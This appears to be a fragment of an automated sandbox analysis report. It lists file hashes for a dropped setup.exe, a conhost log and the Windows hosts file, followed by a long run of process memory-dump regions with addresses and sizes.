                                            • C:\Windows\Temp\setup.exe
                                              Filesize

                                              7.2MB

                                              MD5

                                              15def8d428b61d6d8c55b08f5f0f1214

                                              SHA1

                                              13d440c35ff9c010fda3b86142f9ecb4914f9d10

                                              SHA256

                                              b26ef08f132cbda7a7b42cdc19fed05499df49a0c05764dc02ba2196152e7e85

                                              SHA512

                                              3ca69627c7f2eb30868d2f9173804757bd9b5ec41b22777cc407927c17f99f91b2a35e5286d999240aeb6336d208944bce380207386d693db8685e94c8ed794e

                                            • C:\Windows\Temp\setup.exe
                                              Filesize

                                              7.2MB

                                              MD5

                                              15def8d428b61d6d8c55b08f5f0f1214

                                              SHA1

                                              13d440c35ff9c010fda3b86142f9ecb4914f9d10

                                              SHA256

                                              b26ef08f132cbda7a7b42cdc19fed05499df49a0c05764dc02ba2196152e7e85

                                              SHA512

                                              3ca69627c7f2eb30868d2f9173804757bd9b5ec41b22777cc407927c17f99f91b2a35e5286d999240aeb6336d208944bce380207386d693db8685e94c8ed794e

                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                                              Filesize

                                              539B

                                              MD5

                                              84f2160705ac9a032c002f966498ef74

                                              SHA1

                                              e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

                                              SHA256

                                              7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

                                              SHA512

                                              f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

                                            • C:\Windows\system32\drivers\etc\hosts
                                              Filesize

                                              1KB

                                              MD5

                                              f3f6968a4c0f457f427eb17f7cc5f68b

                                              SHA1

                                              872933578f4b7d555158189ed02015f192daa7c6

                                              SHA256

                                              774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c

                                              SHA512

                                              5dafd8fb0cae325865c0a897e3719250903ac5da72b0fa5006ebda505ee625cd9eacf09c5043c3b3648a5677e96c87f1f2995712471cd1539cd9c73a7e3d0d49

                                            • memory/1128-410-0x000001D91D7B0000-0x000001D91D869000-memory.dmp
                                              Filesize

                                              740KB

                                            • memory/1128-443-0x000001D903340000-0x000001D90334A000-memory.dmp
                                              Filesize

                                              40KB

                                            • memory/1128-404-0x000001D903360000-0x000001D90337C000-memory.dmp
                                              Filesize

                                              112KB

                                            • memory/1128-386-0x0000000000000000-mapping.dmp
                                            • memory/2452-385-0x0000000000000000-mapping.dmp
                                            • memory/2996-183-0x0000000000000000-mapping.dmp
                                            • memory/3060-535-0x0000000000000000-mapping.dmp
                                            • memory/3192-167-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-176-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-133-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-134-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-135-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-136-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-137-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-138-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-139-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-140-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-141-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-142-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-143-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-144-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-145-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-146-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-147-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-148-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-149-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-150-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-151-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-152-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-153-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-154-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-155-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-156-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-157-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-158-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-159-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-160-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-161-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-162-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-163-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-164-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-165-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-117-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-166-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-168-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-170-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-171-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-172-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-174-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-175-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-132-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-178-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-118-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-119-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-131-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-130-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-120-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-121-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-129-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-179-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-177-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-173-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-169-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-128-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-127-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-122-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-123-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-124-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-125-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-116-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3192-126-0x00000000770B0000-0x000000007723E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3484-184-0x0000000000000000-mapping.dmp
                                            • memory/3520-350-0x0000000000000000-mapping.dmp
                                            • memory/3596-180-0x0000000000000000-mapping.dmp
                                            • memory/3596-280-0x00007FFCACF00000-0x00007FFCAD0DB000-memory.dmp
                                              Filesize

                                              1.9MB

                                            • memory/3596-279-0x0000000000400000-0x00000000010AA000-memory.dmp
                                              Filesize

                                              12.7MB

                                            • memory/3596-278-0x0000000000400000-0x00000000010AA000-memory.dmp
                                              Filesize

                                              12.7MB

                                            • memory/3596-196-0x00007FFCACF00000-0x00007FFCAD0DB000-memory.dmp
                                              Filesize

                                              1.9MB

                                            • memory/3596-195-0x0000000000400000-0x00000000010AA000-memory.dmp
                                              Filesize

                                              12.7MB

                                            • memory/4160-285-0x000001AB3FAD0000-0x000001AB3FEEC000-memory.dmp
                                              Filesize

                                              4.1MB

                                            • memory/4160-305-0x000001AB24B80000-0x000001AB24F9C000-memory.dmp
                                              Filesize

                                              4.1MB

                                            • memory/4172-567-0x0000000000000000-mapping.dmp
                                            • memory/4184-557-0x0000000000000000-mapping.dmp
                                            • memory/4204-351-0x0000000000000000-mapping.dmp
                                            • memory/4264-558-0x0000000000000000-mapping.dmp
                                            • memory/4292-566-0x0000000000000000-mapping.dmp
                                            • memory/4304-549-0x0000000000000000-mapping.dmp
                                            • memory/4304-352-0x0000000000000000-mapping.dmp
                                            • memory/4316-292-0x0000000000000000-mapping.dmp
                                            • memory/4320-366-0x0000000000000000-mapping.dmp
                                            • memory/4324-353-0x0000000000000000-mapping.dmp
                                            • memory/4324-550-0x0000000000000000-mapping.dmp
                                            • memory/4360-300-0x000002C8FCFB0000-0x000002C8FCFD2000-memory.dmp
                                              Filesize

                                              136KB

                                            • memory/4360-293-0x0000000000000000-mapping.dmp
                                            • memory/4360-303-0x000002C8FD160000-0x000002C8FD1D6000-memory.dmp
                                              Filesize

                                              472KB

                                            • memory/4368-354-0x0000000000000000-mapping.dmp
                                            • memory/4372-562-0x0000000000000000-mapping.dmp
                                            • memory/4380-362-0x0000000000000000-mapping.dmp
                                            • memory/4412-364-0x0000000000000000-mapping.dmp
                                            • memory/4424-561-0x0000000000000000-mapping.dmp
                                            • memory/4432-363-0x0000000000000000-mapping.dmp
                                            • memory/4460-556-0x0000000000000000-mapping.dmp
                                            • memory/4468-355-0x0000000000000000-mapping.dmp
                                            • memory/4472-554-0x0000000000000000-mapping.dmp
                                            • memory/4488-356-0x0000000000000000-mapping.dmp
                                            • memory/4496-553-0x0000000000000000-mapping.dmp
                                            • memory/4500-551-0x0000000000000000-mapping.dmp
                                            • memory/4516-357-0x0000000000000000-mapping.dmp
                                            • memory/4540-358-0x0000000000000000-mapping.dmp
                                            • memory/4552-552-0x0000000000000000-mapping.dmp
                                            • memory/4556-359-0x0000000000000000-mapping.dmp
                                            • memory/4576-360-0x0000000000000000-mapping.dmp
                                            • memory/4584-559-0x0000000000000000-mapping.dmp
                                            • memory/4644-361-0x0000000000000000-mapping.dmp
                                            • memory/4668-370-0x0000000000400000-0x00000000010AA000-memory.dmp
                                              Filesize

                                              12.7MB

                                            • memory/4668-373-0x0000000000400000-0x00000000010AA000-memory.dmp
                                              Filesize

                                              12.7MB

                                            • memory/4668-372-0x0000000000400000-0x00000000010AA000-memory.dmp
                                              Filesize

                                              12.7MB

                                            • memory/4668-371-0x00007FFCACF00000-0x00007FFCAD0DB000-memory.dmp
                                              Filesize

                                              1.9MB

                                            • memory/4668-374-0x00007FFCACF00000-0x00007FFCAD0DB000-memory.dmp
                                              Filesize

                                              1.9MB

                                            • memory/4672-333-0x0000000000000000-mapping.dmp
                                            • memory/4676-564-0x0000000000000000-mapping.dmp
                                            • memory/4684-565-0x0000000000000000-mapping.dmp
                                            • memory/4712-334-0x0000000000000000-mapping.dmp
                                            • memory/4716-541-0x0000027923F60000-0x0000027923F66000-memory.dmp
                                              Filesize

                                              24KB

                                            • memory/4716-555-0x0000027923F90000-0x0000027923FA2000-memory.dmp
                                              Filesize

                                              72KB

                                            • memory/4740-569-0x000000014036DB84-mapping.dmp
                                            • memory/4740-574-0x0000000140000000-0x0000000140803000-memory.dmp
                                              Filesize

                                              8.0MB

                                            • memory/4740-575-0x0000000140000000-0x0000000140803000-memory.dmp
                                              Filesize

                                              8.0MB

                                            • memory/4764-335-0x0000000000000000-mapping.dmp
                                            • memory/4784-336-0x0000000000000000-mapping.dmp
                                            • memory/4808-337-0x0000000000000000-mapping.dmp
                                            • memory/4828-338-0x0000000000000000-mapping.dmp
                                            • memory/4848-339-0x0000000000000000-mapping.dmp
                                            • memory/4856-536-0x0000000000000000-mapping.dmp
                                            • memory/4860-340-0x0000000000000000-mapping.dmp
                                            • memory/4916-341-0x0000000000000000-mapping.dmp
                                            • memory/4944-342-0x0000000000000000-mapping.dmp
                                            • memory/4964-343-0x0000000000000000-mapping.dmp
                                            • memory/4968-538-0x0000000000000000-mapping.dmp
                                            • memory/4984-344-0x0000000000000000-mapping.dmp
                                            • memory/5004-345-0x0000000000000000-mapping.dmp
                                            • memory/5024-539-0x0000000000000000-mapping.dmp
                                            • memory/5036-346-0x0000000000000000-mapping.dmp
                                            • memory/5048-347-0x0000000000000000-mapping.dmp
                                            • memory/5056-585-0x0000026F90BA0000-0x0000026F90BA7000-memory.dmp
                                              Filesize

                                              28KB

                                            • memory/5056-582-0x0000026F90F10000-0x0000026F90F16000-memory.dmp
                                              Filesize

                                              24KB

                                            • memory/5092-348-0x0000000000000000-mapping.dmp
                                            • memory/5100-540-0x0000000000000000-mapping.dmp
                                            • memory/5104-563-0x0000000000400000-0x000000000040C000-memory.dmp
                                              Filesize

                                              48KB

                                            • memory/5104-579-0x0000000000400000-0x000000000040C000-memory.dmp
                                              Filesize

                                              48KB

                                            • memory/5104-544-0x0000000000401BEA-mapping.dmp
                                            • memory/5108-349-0x0000000000000000-mapping.dmp
                                            • memory/5108-542-0x0000000000000000-mapping.dmp